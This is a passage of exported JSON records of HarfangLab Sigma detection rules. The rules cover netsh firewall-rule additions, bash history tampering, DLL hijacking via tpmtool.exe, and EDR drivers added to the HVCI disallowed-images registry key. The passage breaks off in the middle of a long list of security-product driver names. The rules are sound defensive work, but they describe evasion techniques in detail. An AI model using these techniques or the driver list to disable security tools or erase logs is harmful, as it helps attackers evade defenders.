exclusion_logioption:\n # netsh advfirewall firewall add rule name=\"LogiOptionsMgr.EXE\" dir=in action=allow program=\"C:\\ProgramData\\Logishrd\\LogiOptions\\Software\\Current\\LogiOptionsMgr.EXE\" description=\"LogiOptionsMgr.EXE\" enable=yes\n # C:\\Windows\\system32\\netsh advfirewall firewall add rule name=LogiOptionsMgr.EXE dir=in action=allow program=C:\\ProgramData\\Logishrd\\LogiOptions\\Software\\Current\\LogiOptionsMgr.EXE description=LogiOptionsMgr.EXE enable=yes\n CommandLine|contains: '?:\\ProgramData\\Logishrd\\LogiOptions\\Software\\Current\\LogiOptionsMgr.EXE'\n\n exclusion_symantec:\n # netsh advfirewall firewall add rule name=Symantec Endpoint Protection Manager Webserver protocol=any action=allow dir=in enable=yes edge=no profile=domain,private,public program=C:\\Program Files (x86)\\Symantec\\Symantec Endpoint Protection Manager\\apache\\bin\\httpd.exe\n # netsh advfirewall firewall add rule name=Symantec Endpoint Protection Manager protocol=any action=allow dir=in enable=yes edge=no profile=domain,private,public program=C:\\Program Files (x86)\\Symantec\\Symantec Endpoint Protection Manager\\tomcat\\bin\\SemSvc.exe\n # netsh advfirewall firewall add rule name=\"Symantec Endpoint Protection Manager\" protocol=any action=allow dir=in enable=yes edge=no profile=domain,private,public program=\"C:\\Program Files (x86)\\Symantec\\Symantec Endpoint Protection Manager\\tomcat\\bin\\SemSvc.exe\"\n CommandLine|contains|all:\n - 'Symantec Endpoint Protection Manager'\n - '?:\\Program Files (x86)\\Symantec\\Symantec Endpoint Protection Manager'\n\n exclusion_intel:\n ParentCommandLine: '?:\\Windows\\system32\\cmd.exe /C installer.bat X I > log_install.txt 2>&1'\n GrandparentImage: '?:\\Program Files\\Intel\\SUR\\QUEENCREEK\\SurSvc.exe'\n\n exclusion_centrastage1:\n ParentImage: '?:\\ProgramData\\CentraStage\\AEMAgent\\AEMAgent.exe'\n GrandparentImage: '?:\\Program Files (x86)\\CentraStage\\CagService.exe'\n\n exclusion_centrastage2:\n # 
C:\\ProgramData\\CentraStage\\AEMAgent\\RMM.WebRemote\\10.3.0.52\\RMM.WebRemote.exe\n ParentImage: '?:\\ProgramData\\CentraStage\\AEMAgent\\RMM.WebRemote\\\\*\\RMM.WebRemote.exe'\n GrandparentImage: '?:\\ProgramData\\CentraStage\\AEMAgent\\AEMAgent.exe'\n\n exclusion_centrastage3:\n # netsh advfirewall firewall add rule name=rmm.webremote 9.8.0.13 dir=in action=allow program=c:\\programdata\\centrastage\\aemagent\\rmm.webremote\\9.8.0.13\\rmm.webremote.exe enable=yes\n # netsh advfirewall firewall add rule name=rmm.webremote 9.8.0.13 dir=out action=allow program=c:\\programdata\\centrastage\\aemagent\\rmm.webremote\\9.8.0.13\\rmm.webremote.exe enable=yes\n # netsh advfirewall firewall add rule name=aemagent dir=in action=allow program=c:\\programdata\\centrastage\\aemagent\\aemagent.exe enable=yes\n # netsh advfirewall firewall add rule name=aemagent dir=out action=allow program=c:\\programdata\\centrastage\\aemagent\\aemagent.exe enable=yes\n # netsh advfirewall firewall add rule name=aria dir=in action=allow program=c:\\programdata\\centrastage\\aemagent\\aria2c.exe enable=yes\n # netsh advfirewall firewall add rule name=aria dir=out action=allow program=c:\\programdata\\centrastage\\aemagent\\aria2c.exe enable=yes\n CommandLine|contains: 'program=?:\\programdata\\centrastage\\aemagent\\'\n\n exclusion_wechat:\n # netsh advfirewall firewall add rule name=WeChat dir=in action=allow program=C:\\Program Files (x86)\\Tencent\\WeChat\\WeChatPlayer.exe enable=yes\n # netsh advfirewall firewall add rule name=WeChat dir=in action=allow program=C:\\Program Files (x86)\\Tencent\\WeChat\\WeChatBrowser.exe enable=yes\n # netsh advfirewall firewall add rule name=WeChat dir=in action=allow program=C:\\Program Files (x86)\\Tencent\\WeChat\\WeChat.exe enable=yes\n CommandLine|contains|all:\n - 'name=WeChat'\n - '?:\\Program Files (x86)\\Tencent\\WeChat\\WeChat'\n\n exclusion_panda:\n # netsh.exe advfirewall firewall add rule name=panda endpoint agent dir=in program=c:\\program 
files (x86)\\panda security\\panda aether agent\\agentsvc.exe action=allow profile=any protocol=tcp\n # netsh.exe advfirewall firewall add rule name=panda endpoint agent dir=in program=c:\\program files (x86)\\panda security\\panda aether agent\\agentsvc.exe action=allow profile=any protocol=udp\n CommandLine|contains|all:\n - 'panda endpoint agent '\n - 'program=?:\\program files (x86)\\panda security\\panda aether agent\\agentsvc.exe'\n\n exclusion_sharepoint:\n ParentImage: '?:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\\\??\\BIN\\OWSTIMER.EXE'\n CommandLine|contains:\n - '?:\\windows\\system32\\netsh.exe advfirewall firewall add rule name=ilm web service - rms dir=in remoteip=localsubnet action=allow protocol=tcp localport=5725'\n - '?:\\windows\\system32\\netsh.exe advfirewall firewall add rule name=ilm web service - sts dir=in remoteip=localsubnet action=allow protocol=tcp localport=5726'\n\n exclusion_workflowmanagertools:\n CommandLine|startswith: 'netsh advfirewall firewall add rule name=Workflow Manager Tools'\n ParentCommandLine|contains: '?:\\Program Files (x86)\\Workflow Manager Tools\\'\n\n exclusion_juliewebapp:\n CommandLine|startswith:\n - 'netsh advfirewall firewall add rule name=Julie* program=C:\\Program Files (x86)\\Julie Software\\'\n - 'netsh advfirewall firewall add rule name=Julie* dir=in action=allow protocol=TCP localport='\n ParentImage: '?:\\Windows\\SysWOW64\\msiexec.exe'\n\n exclusion_manageengine:\n CommandLine: '?:\\Windows\\System32\\netsh.exe advfirewall firewall add rule name=ManageEngine *'\n ParentCommandLine: '?:\\Windows\\system32\\cscript.exe firewallException.vbs ADD *'\n Ancestors|contains: '\\ManageEngine_'\n\n exclusion_manageengine2:\n CommandLine: '?:\\Windows\\System32\\netsh.exe advfirewall firewall add rule name=*'\n Ancestors|contains: '|?:\\Program Files (x86)\\ManageEngine\\UEMS_Agent\\dcconfig.exe|?:\\Program Files (x86)\\ManageEngine\\UEMS_Agent\\bin\\dcagentservice.exe|'\n\n 
exclusion_labtech:\n GrandparentImage: '?:\\Windows\\LTSvc\\LTSVC.exe'\n\n exclusion_schneider:\n GrandparentImage: '?:\\Program Files (x86)\\Schneider Electric\\FloatingLicenseManager\\ReadOptFileWinServ.exe'\n\n exclusion_siemens:\n ProcessGrandparentImage: '?:\\Windows\\Temp\\TSplusInstaller\\Setup-Siemens.exe'\n ProcessGrandparentSigned: 'true'\n ProcessGrandparentSignature: 'TSplus SAS'\n\n exclusion_printx:\n ParentCommandLine: '?:\\windows\\system32\\cmd.exe /c ?:\\program files\\printix.net\\printix client\\open_firewall.cmd'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "48c6cf63-7480-4181-ad6b-865dbb4d413c",
"rule_name": "New Rule added to the Windows Firewall Policy via Netsh",
"rule_description": "Detects a new rule added to the Windows firewall's policy using Netsh.\nAdversaries may disable or modify system firewalls in order to bypass controls limiting network usage.\nChanges could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules.\nIt is recommended to investigate the added firewall rule, as well as the execution context and surrounding detections to determine if this action was legitimate.\n",
"rule_creation_date": "2021-05-06",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1090",
"attack.t1562.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "48dbdaf6-eeec-46f9-b3da-e1fa449854a5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.628346Z",
"creation_date": "2026-03-23T11:45:34.628348Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.628352Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md",
"https://attack.mitre.org/techniques/T1070/003/"
],
"name": "t1070_003_bash_history_modified_linux.yml",
"content": "title: Bash History File Modified\nid: 48dbdaf6-eeec-46f9-b3da-e1fa449854a5\ndescription: |\n Detects a suspicious modification of the bash history files.\n Attackers can modify the bash history files to hide their tracks by removing their command history.\n It is recommended to check the parent process for suspicious activities.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md\n - https://attack.mitre.org/techniques/T1070/003/\ndate: 2023/01/03\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1070.003\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.Deletion\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection:\n - Path|endswith: '/.bash_history'\n - TargetPath|endswith: '/.bash_history'\n\n filter_read:\n Kind: 'access'\n Permissions: 'read'\n\n filter_misc:\n Kind:\n - 'remove' # This is handled by the rule 4f8964a4-5740-479c-8358-30799f2df2d6\n - 'rename' # This is handled by the rule 4f8964a4-5740-479c-8358-30799f2df2d6\n - 'chmod'\n - 'chown'\n\n exclusion_bash:\n ProcessImage:\n - '/bin/bash'\n - '/usr/bin/bash'\n - '/nix/store/*bash*/bin/bash'\n\n exclusion_librenms:\n ProcessGrandparentImage: '/usr/sbin/crond'\n ProcessParentCommandLine: '/bin/bash -c /opt/librenms/fixrights.sh'\n\n exclusion_docker:\n ProcessImage:\n - '/usr/local/bin/dockerd'\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n\n exclusion_mkhomedir_helper:\n ProcessImage:\n - '/usr/bin/mkhomedir_helper'\n - '/usr/sbin/mkhomedir_helper'\n\n # Some servers can have a custom PROMPT_COMMAND to sync the different bash_history\n exclusion_tee_append:\n ProcessImage: '/usr/bin/tee'\n ProcessCommandLine|startswith: 'tee -a '\n\n exclusion_rsnapshot:\n ProcessParentCommandLine: '/usr/bin/perl -w /usr/bin/rsnapshot daily'\n\n 
exclusion_puppet:\n ProcessImage|startswith: '/opt/puppetlabs/'\n\n exclusion_rsync:\n - ProcessImage: '/usr/bin/rsync'\n - ProcessParentImage: '/usr/bin/rsync'\n\n exclusion_rancher_kube:\n ProcessImage: '/usr/local/bin/rke2'\n\n exclusion_basebackup:\n ProcessImage: '/bin/pg_basebackup'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "48dbdaf6-eeec-46f9-b3da-e1fa449854a5",
"rule_name": "Bash History File Modified",
"rule_description": "Detects a suspicious modification of the bash history files.\nAttackers can modify the bash history files to hide their tracks by removing their command history.\nIt is recommended to check the parent process for suspicious activities.\n",
"rule_creation_date": "2023-01-03",
"rule_modified_date": "2026-02-11",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1070.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "48f0f344-553f-4625-bdde-3c3f6e4f8e44",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.600997Z",
"creation_date": "2026-03-23T11:45:34.601001Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.601008Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_tpmtool.yml",
"content": "title: DLL Hijacking via tpmtool.exe\nid: 48f0f344-553f-4625-bdde-3c3f6e4f8e44\ndescription: |\n Detects potential Windows DLL Hijacking via tpmtool.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'tpmtool.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\tbs.dll'\n - '\\tpmcoreprovisioning.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "48f0f344-553f-4625-bdde-3c3f6e4f8e44",
"rule_name": "DLL Hijacking via tpmtool.exe",
"rule_description": "Detects potential Windows DLL Hijacking via tpmtool.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "48fe9f11-44de-4b4b-807c-00bb14c3058b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071663Z",
"creation_date": "2026-03-23T11:45:34.071665Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071669Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://raw.githubusercontent.com/trailofbits/publications/offensivecon-2023/presentations/Your%20Mitigations%20are%20My%20Opportunities/Your%20Mitigations%20are%20My%20Opportunities.pdf",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_hvci_driver_disable.yml",
"content": "title: EDR/AV Driver added to HVCI Disallowed Images in Registry\nid: 48fe9f11-44de-4b4b-807c-00bb14c3058b\ndescription: |\n Detects common AV or EDR driver names being written into the HVCIDisallowedImages registry key. This feature will only take effect on the next machine reboot.\n HVCI (Hypervisor Enforced Code Integrity) is a Windows mechanism that contains an undocumented feature that allows to register an array of driver names to be blocked.\n Attackers can use this feature to disable security products by blocking their respective drivers.\n It is recommended to check whether the process modifying the registry keys has legitimate reasons to do it.\nreferences:\n - https://raw.githubusercontent.com/trailofbits/publications/offensivecon-2023/presentations/Your%20Mitigations%20are%20My%20Opportunities/Your%20Mitigations%20are%20My%20Opportunities.pdf\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2023/06/13\nmodified: 2025/04/10\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\System\\CurrentControlSet\\Control\\CI\\HVCIDisallowedImages'\n Details|contains:\n # 360 Software (Beijing)\n - '360qpesv.sys'\n # 5nine Software Inc.\n - '5nine.cbt.sys'\n # Ahkun Co.\n - 'AhkSvPro.sys'\n - 'AhkUsbFW.sys'\n - 'AhkAMFlt.sys'\n # Ahnlab\n - 'V3MifiNt.sys'\n - 'V3Ift2k.sys'\n - 'V3IftmNt.sys'\n - 'ArfMonNt.sys'\n - 'AhnRghLh.sys'\n - 'AszFltNt.sys'\n - 'OMFltLh.sys'\n - 'V3Flu2k.sys'\n - 'AdcVcsNT.sys'\n # AhnLab Inc.\n - 'TfFregNt.sys'\n # AhnLab, Inc.\n - 'SMDrvNt.sys'\n - 'ATamptNt.sys'\n - 'V3Flt2k.sys'\n # Alwil\n - 'aswmonflt.sys'\n # Anvisoft\n - 'avfsmn.sys'\n # Arcdo\n - 'ANVfsm.sys'\n - 
'CDrRSFlt.sys'\n # Ashampoo GmbH & Co. KG\n - 'AshAvScan.sys'\n # Australian Projects\n - 'ZxFsFilt.sys'\n # Authentium\n - 'avmf.sys'\n # AVG Grisoft\n - 'avgmfx86.sys'\n - 'avgmfx64.sys'\n - 'avgmfi64.sys'\n - 'avgmfrs.sys'\n # Avira GmbH\n - 'avgntflt.sys'\n # AVNOS\n - 'kavnsi.sys'\n # AvSoft Technologies\n - 'strapvista.sys'\n - 'strapvista64.sys'\n # AxBx\n - 'vk_fsf.sys'\n # Baidu (beijing)\n - 'BDFileDefend.sys'\n # Baidu (Hong Kong) Limited\n - 'Bfilter.sys'\n # Baidu online network technology (beijing)Co.\n - 'BDsdKit.sys'\n - 'bd0003.sys'\n # Beijing Kingsoft\n - 'ksfsflt.sys'\n # Beijing Majorsec\n - 'majoradvapi.sys'\n # Beijing Rising Information Technology Corporation Limited\n - 'HookSys.sys'\n # Beijing Venus\n - 'TxFileFilter.sys'\n - 'VTSysFlt.sys'\n # Binary Defense Systems\n - 'Osiris.sys'\n # Bit9 Inc\n - 'b9kernel.sys'\n # Bitdefender\n - 'bdsvm.sys'\n # BitDefender SRL\n - 'hbflt.sys'\n - 'vlflt.sys'\n - 'gzflt.sys'\n - 'bddevflt.sys'\n - 'ignis.sys'\n - 'AVCKF.SYS'\n - 'gemma.sys'\n - 'Atc.sys'\n - 'AVC3.SYS'\n - 'TRUFOS.SYS'\n # Bkav Corporation\n - 'BkavAutoFlt.sys'\n - 'BkavSdFlt.sys'\n # BLACKFORT SECURITY\n - 'bSyirmf.sys'\n - 'bSysp.sys'\n - 'bSydf.sys'\n - 'bSywl.sys'\n - 'bSyrtm.sys'\n - 'bSyaed.sys'\n - 'bSyar.sys'\n # BullGuard\n - 'BdFileSpy.sys'\n # C-NetMedia Inc\n - 'antispyfilter.sys'\n # CheckMAL Inc\n - 'AppCheckD.sys'\n # Cheetah Mobile Inc.\n - 'wdocsafe.sys'\n - 'lbprotect.sys'\n # Cisco Systems\n - 'csaav.sys'\n - 'CiscoSAM.sys'\n - 'immunetselfprotect.sys'\n - 'immunetprotect.sys'\n - 'CiscoAMPCEFWDriver.sys'\n - 'CiscoAMPHeurDriver.sys'\n # CJSC Returnil Software\n - 'rvsmon.sys'\n # CodeProof Technologies Inc\n - 'CpAvFilter.sys'\n - 'CpAvKernel.sys'\n # Comodo Group Inc.\n - 'cmdccav.sys'\n - 'cmdguard.sys'\n # Computer Assoc\n - 'caavFltr.sys'\n - 'ino_fltr.sys'\n # ConeSecurity Inc\n - 'CSFlt.sys'\n # Confluera Inc\n - 'tbmninifilter.sys'\n # Coranti Inc.\n - 'crnsysm.sys'\n - 'crncache32.sys'\n - 
'crncache64.sys'\n # CoreTrace Corporation\n - 'bouncer.sys'\n # CrowdStrike Ltd.\n - 'csagent.sys'\n # Dakota State University\n - 'EdnemFsFilter.sys'\n # Deep Instinct\n - 'DeepInsFS.sys'\n # Digitalonnet\n - 'ADSpiderDoc.sys'\n # Doctor Web\n - 'drwebfwft.sys'\n - 'DwShield.sys'\n - 'DwShield64.sys'\n - 'dwprot.sys'\n # Doctor Web Ltd.\n - 'Spiderg3.sys'\n # DriveSentry Inc\n - 'drivesentryfilterdriver2lite.sys'\n # EasyAntiCheat Solutions\n - 'easyanticheat.sys'\n # eEye Digital Security\n - 'eeyehv.sys'\n - 'eeyehv64.sys'\n # Egnyte Inc\n - 'egnfsflt.sys'\n # EMC\n - 'ECATDriver.sys'\n # Emsi Software GmbH\n - 'a2ertpx86.sys'\n - 'a2ertpx64.sys'\n - 'a2gffx86.sys'\n - 'a2gffx64.sys'\n - 'a2gffi64.sys'\n - 'a2acc.sys'\n - 'a2acc64.sys'\n # EnigmaSoft\n - 'EnigmaFileMonDriver.sys'\n # ESET, spol. s r.o.\n - 'eamonm.sys'\n # ESTsecurity Corp\n - 'RSRtw.sys'\n - 'RSPCRtw.sys'\n # ESTsoft\n - 'AYFilter.sys'\n - 'Rtw.sys'\n # ESTsoft corp.\n - 'EstRkmon.sys'\n - 'EstRkr.sys'\n # ETRI\n - 'vrSDetri.sys'\n - 'vrSDetrix.sys'\n # Everyzone\n - 'TvMFltr.sys'\n # EveryZone Inc.\n - 'IProtect.sys'\n # EveryZone INC.\n - 'TvFiltr.sys'\n - 'TvDriver.sys'\n - 'TvSPFltr.sys'\n - 'TvPtFile.sys'\n # f-protect\n - 'fpav_rtp.sys'\n # f-secure\n - 'fsgk.sys'\n # Filseclab\n - 'fildds.sys'\n # Fortinet Inc.\n - 'FortiAptFilter.sys'\n - 'fortimon2.sys'\n - 'fortirmon.sys'\n - 'fortishield.sys'\n # Fujitsu Social Science\n - 'wscm.sys'\n # FXSEC LTD\n - 'pfkrnl.sys'\n # G Data\n - 'HookCentre.sys'\n - 'PktIcpt.sys'\n - 'MiniIcpt.sys'\n # GAS Tecnologia\n - 'GbpKm.sys'\n # Greatsoft Corp.Ltd\n - 'vcdriv.sys'\n - 'vcreg.sys'\n - 'vchle.sys'\n # GRGBanking Equipment\n - 'SECOne_USB.sys'\n - 'SECOne_Proc10.sys'\n - 'SECOne_REG10.sys'\n - 'SECOne_FileMon10.sys'\n # GridinSoft LLC\n - 'gtkdrv.sys'\n # HAURI\n - 'VrARnFlt.sys'\n - 'VrBBDFlt.sys'\n - 'vrSDfmx.sys'\n - 'vrSDam.sys'\n - 'VrAptDef.sys'\n - 'VrSdCore.sys'\n - 'VrFsFtM.sys'\n - 'VrFsFtMX.sys(AMD64)'\n - 'vradfil2.sys'\n # HAURI 
Inc.\n - 'VRAPTFLT.sys'\n # Hidden Reflex\n - 'epicFilter.sys'\n # Hitachi Solutions\n - 'hsmltwhl.sys'\n - 'hssfwhl.sys'\n # HSM IT-Services Gmbh\n - 'oavfm.sys'\n # Huorong Security\n - 'sysdiag.sys'\n # IBM\n - 'issregistry.sys'\n # IKARUS Security\n - 'ntguard.sys'\n # Imperva Inc.\n - 'mfdriver.sys'\n # INCA Internet Co.\n - 'npxgd.sys'\n - 'npxgd64.sys'\n - 'tkpl2k.sys'\n - 'tkpl2k64.sys'\n - 'GKFF.sys'\n - 'GKFF64.sys'\n - 'tkdac2k.sys'\n - 'tkdacxp.sys'\n - 'tkdacxp64.sys'\n - 'tksp2k.sys'\n - 'tkspxp.sys'\n - 'tkspxp64.sys'\n # INCA Internet Co., Ltd\n - 'tkfsft.sys'\n - 'tkfsft64.sys'\n - 'tkfsavxp.sys'\n - 'tkfsavxp64.sys'\n # Individual developer (Soft3304)\n - 'AntiLeakFilter.sys'\n # IObit Information Tech\n - 'IMFFilter.sys'\n # ISS\n - 'issfltr.sys'\n # K7 Computing Private Ltd.\n - 'K7Sentry.sys'\n # Kaspersky\n - 'klbg.sys'\n - 'kldback.sys'\n - 'kldlinf.sys'\n - 'kldtool.sys'\n - 'klif.sys'\n # Kaspersky Lab\n - 'klam.sys'\n # KINGSOFT\n - 'dgsafe.sys'\n # knowwheresoft Ltd\n - 'securoFSD_x64.sys'\n # Komoku Inc.\n - 'kmkuflt.sys'\n # Lavasoft AB\n - 'lbd.sys'\n # Leith Bade\n - 'cwdriver.sys'\n # Lenovo\n - 'lnvscenter.sys'\n # Lightspeed Systems Inc.\n - 'SAFsFilter.sys'\n # Malwarebytes Corp.\n - 'FlightRecorder.sys'\n - 'mbam.sys'\n # MastedCode Ltd\n - 'fsfilter.sys'\n # Max Secure Software\n - 'MaxProc64.sys'\n - 'MaxProtector.sys'\n - 'maxcryptmon.sys'\n - 'SDActMon.sys'\n # McAfee Inc.\n - 'epdrv.sys'\n - 'mfencoas.sys'\n - 'mfehidk.sys'\n - 'swin.sys'\n # Meidensha Corp\n - 'WhiteShield.sys'\n # Microsoft\n - 'WdFilter.sys'\n - 'mpFilter.sys'\n - 'SysmonDrv.sys'\n # MicroWorld Software Services Pvt. 
Ltd.\n - 'mwfsmfltr.sys'\n # NeoAutus\n - 'NeoKerbyFilter'\n # Netlor SAS\n - 'KUBWKSP.sys'\n # NetSecurity Corp\n - 'trfsfilter.sys'\n # NHN\n - 'nsminflt.sys'\n - 'nsminflt64.sys'\n # Norman\n - 'nvcmflt.sys'\n # Norman ASA\n - 'nprosec.sys'\n - 'nregsec.sys'\n # Novatix Corporation\n - 'NxFsMon.sys'\n # NPcore Ltd\n - 'FileScan.sys'\n # Odyssey Cyber Security\n - 'ODFsFimFilter.sys'\n - 'ODFsTokenFilter.sys'\n - 'ODFsFilter.sys'\n # OKUMA Corp\n - 'ospfile_mini.sys'\n # OnMoon Company LLC\n - 'acdrv.sys'\n # Palo Alto Networks\n - 'CyvrFsfd.sys'\n # Panda Security\n - 'PSINPROC.SYS'\n - 'PSINFILE.SYS'\n - 'amfsm.sys'\n - 'amm8660.sys'\n - 'amm6460.sys'\n # Panda Software\n - 'NanoAVMF.sys'\n - 'shldflt.sys'\n # Panzor Cybersecurity\n - 'pavdrv.sys'\n # Paretologic\n - 'PLGFltr.sys'\n # PC Tools Pty. Ltd.\n - 'PCTCore64.sys'\n - 'PCTCore.sys'\n - 'ikfilesec.sys'\n # Perfect World Co. Ltd\n - 'PerfectWorldAntiCheatSys.sys'\n # PerfectWorld Ltd\n - 'PWProtect.sys'\n # PerSystems SA\n - 'pervac.sys'\n # Pooyan System\n - 'RanPodFS.sys'\n # PWI, Inc.\n - 'pwipf6.sys'\n # Qihoo 360\n - 'dsark.sys'\n - '360avflt.sys'\n # Quick Heal Technologies Pvt. Ltd.\n - 'snsrflt.sys'\n - 'bdsflt.sys'\n - 'arwflt.sys'\n # Quick Heal TechnologiesPvt. 
